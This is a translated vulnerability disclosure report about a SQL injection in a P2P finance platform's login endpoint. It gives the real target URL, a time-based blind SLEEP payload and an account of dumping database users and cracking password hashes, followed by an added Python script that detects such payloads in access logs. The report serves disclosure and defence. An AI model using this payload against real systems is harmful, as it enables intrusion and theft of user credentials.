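2015-08-03: Details reported to the vendor; awaiting vendor handling
2015-08-04: Vendor confirmed; details disclosed to the vendor only
2015-08-14: Details disclosed to core white hats and experts in related fields
2015-08-24: Details disclosed to regular white hats
2015-09-03: Details disclosed to intern white hats
2015-09-18: Details disclosed to the public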
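SQL injection in P2P finance platform 普益财富 exposes a large amount of database user information
The P2P finance platform 普益财富 has a SQL injection vulnerability through which a large amount of database user information can be obtained. http://member-center.pywm.com.cn/
Injection URL: http://member-center.pywm.com.cn/customer/get_login_pass.ajax.php?login_name=%E6%89%8B%E6%9C%BA%E5%8F%B7%E7%A0%819988%bf
The injection point is the login_name parameter.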
Parameter: login_name (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: login_name=%E6%89%8B%E6%9C%BA%E5%8F%B7%E7%A0%819988%bf' AND (SELECT * FROM (SELECT(SLEEP(5)))XfmR) AND 'yjbk'='yjbk
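Checking the privileges of the injection shows the database account is a DBA.
I looked at the list of databases (dbs) and the current database.
I enumerated the database users and found 73 of them, most of which are on the public Internet.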
Password hashes were dumped for more than 10 users.
The passwords of two users were cracked.
Fix: apply proper input filtering.
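On the detection side, requests like the time-based payload reported above can be picked out of web access logs. The following is an added example, not part of the original report or the vendor's code; it only covers the SLEEP(n) pattern, and the log format (request duration in seconds as the last field) and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not from the report). Assumed format:
# client "METHOD url PROTO" status request_time_seconds
SAMPLE_LOG = """\
198.51.100.7 "GET /customer/get_login_pass.ajax.php?login_name=13800000000 HTTP/1.1" 200 0.041
198.51.100.9 "GET /customer/get_login_pass.ajax.php?login_name=x%bf'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))XfmR)%20AND%20'yjbk'='yjbk HTTP/1.1" 200 5.038
198.51.100.9 "GET /customer/get_login_pass.ajax.php?login_name=x%bf'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))XfmR)%20AND%20'yjbk'='yjbk HTTP/1.1" 200 0.039
203.0.113.4 "GET /customer/get_login_pass.ajax.php?login_name=sleepy_user HTTP/1.1" 200 0.050
"""

LINE_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) [^"]*" \d{3} ([\d.]+)$')
# A quote that breaks out of the string literal, later followed by SLEEP(<n>).
DELAY_RE = re.compile(r"""['"].*?\bsleep\s*\(\s*(\d+)\s*\)""", re.I | re.S)


def scan(log_text, param="login_name"):
    """Return (client, verdict, seconds) for requests whose `param` carries a SLEEP payload."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed format
        client, url, elapsed = m.group(1), m.group(2), float(m.group(3))
        # parse_qs percent-decodes the value, so encoded payloads are matched too.
        for value in parse_qs(urlsplit(url).query).get(param, []):
            hit = DELAY_RE.search(value)
            if not hit:
                continue
            # The response took at least as long as the requested delay: the
            # injected SLEEP most likely ran. Otherwise it is only an attempt.
            verdict = "delay-observed" if elapsed >= int(hit.group(1)) else "attempt"
            findings.append((client, verdict, elapsed))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "delay-observed" finding means the endpoint is probably still injectable and should be treated as an incident; an "attempt" with a fast response suggests the payload did not reach the database as SQL.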
Severity: Medium
Vulnerability Rank: 6
Confirmation time: 2015-08-04 11:15
The impact was caused by a feature that has already been retired.
None yet.